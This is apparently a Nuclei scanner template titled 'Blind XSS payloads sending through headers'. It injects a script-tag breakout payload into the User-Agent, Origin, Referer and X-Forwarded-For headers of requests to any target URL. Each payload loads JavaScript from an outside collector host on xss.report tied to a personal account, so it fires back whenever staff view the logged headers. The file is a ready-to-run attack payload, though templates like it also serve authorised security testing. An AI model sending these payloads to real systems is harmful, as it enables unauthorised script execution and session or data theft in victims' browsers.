id: BXSS

info:
  name: Blind XSS payloads sending through headers
  author: 25
  severity: high
  tags: XSS

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    headers:
      User-Agent: '''>"></title></style></textarea></script><script src=https://xss.report/c/adnanapriliyansyah</script>'
      Origin: '''>"></title></style></textarea></script><script src=https://xss.report/c/adnanapriliyansyah</script>'
      Referer: '''>"></title></style></textarea></script><script src=https://xss.report/c/adnanapriliyansyah</script>'
      X-Forwarded-For: '''>"></title></style></textarea></script><script src=https://xss.report/c/adnanapriliyansyah</script>'
      Test-header: 'Testing for Blind XSS'
